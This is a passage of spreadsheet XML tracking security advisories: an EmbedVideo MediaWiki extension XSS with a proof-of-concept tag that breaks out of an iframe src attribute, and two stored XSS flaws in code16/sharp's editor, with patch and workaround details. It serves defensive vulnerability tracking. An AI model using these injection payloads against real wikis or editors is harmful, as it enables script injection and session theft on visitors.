The iframe assembled [here](https://github.com/StarCitizenWiki/mediawiki-extensions-EmbedVideo/blob/a573a16d925ee0ea0d34b360856dc8ab0b88f822/includes/EmbedService/EmbedHtmlFormatter.php#L204-L208) adds the url from `getUrl()` as the src without sanitization.
The id regex for the archiveorg service and the url regexes for the wistia and sharepoint services allow for double quotes to be introduced.
### PoC
Using double quotes, the src attribute can be escaped.
```
&lt;embedvideo service="archiveorg" id='a" onmouseover="alert(document.domain)" data-x="'&gt;&lt;/embedvideo&gt;
```
### Impact
When $wgEmbedVideoRequireConsent = false, any user able to edit a page can inject arbitrary JavaScript into an HTML event handler attribute (e.g. onfocus) via parameter. It requires no interaction (autofires via autofocus) and executes in the wiki origin for every visitor to the page.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57440</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61823</t>
        </is>
      </c>
      <c r="D19" s="5" t="inlineStr"/>
      <c r="E19" s="5" t="inlineStr"/>
      <c r="F19" s="5" t="inlineStr"/>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr"/>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>composer:code16/sharp</t>
        </is>
      </c>
      <c r="M19" s="5" t="inlineStr">
        <is>
          <t>9.22.5</t>
        </is>
      </c>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr"/>
      <c r="P19" s="5" t="inlineStr"/>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>### Impact
A Stored Cross-Site Scripting (XSS) vulnerability exists in the rich text editor due to improper sanitization of the srcdoc attribute on &lt;iframe&gt; elements.
While the underlying Symfony HtmlSanitizer correctly HTML-encodes special characters inside the attribute value (e.g., converting &lt;script&gt; to &amp;lt;script&amp;gt;), the HTML specification mandates that browsers automatically decode HTML entities inside attribute values before processing them. As a result, any encoded JavaScript inside a srcdoc attribute is evaluated and executed as live HTML/JS in the context of the iframe when the page is rendered.
An attacker with permissions to edit an Editor field can inject malicious scripts to target other users viewing the content. Potential impacts include:
- Session Hijacking (stealing admin session cookies via document.cookie)
- Account Takeover &amp; Privilege Escalation (e.g., a low-privileged editor triggering actions as an Administrator)
- Admin panel data theft
### Patches
The vulnerability has been patched in version v9.22.5.
The fix explicitly removes srcdoc from the list of allowed iframe attributes in `src/Utils/Sanitization/FormatsSanitizedValue.php`.
### Workarounds
Users who cannot upgrade immediately can manually sanitize all content of editor fields to strip `srcdoc` attributes.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61823</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61825</t>
        </is>
      </c>
      <c r="D20" s="5" t="inlineStr"/>
      <c r="E20" s="5" t="inlineStr"/>
      <c r="F20" s="5" t="inlineStr"/>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>composer:code16/sharp</t>
        </is>
      </c>
      <c r="M20" s="5" t="inlineStr">
        <is>
          <t>9.22.5</t>
        </is>
      </c>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr"/>
      <c r="P20" s="5" t="inlineStr"/>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>### Impact
The vulnerability allows an attacker to bypass the HTML sanitizer by using the `data-html-content` attribute in the content of a `SharpEditorFormField`. 
### Patches
The field must now explicitly configure `SharpFormEditorField::RAW_HTML` in the toolbar to keep this behavior. **When using the  `RAW_HTML` button, the application using `code16/sharp` must sanitize manually the content coming from the field**. 
Vulnerability has been patched in version 9.22.5.
### Workarounds
Sanitize every contents of editors manually (e.g. using Symfony/HtmlSanitizer)</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61825</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T20"/>
  <conditionalFormatting sqref="E2:E20">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20">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2026-09-26T05:34:05Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-26T05:34:06Z</dcterms:modified>
</cp:coreProperties>
</file>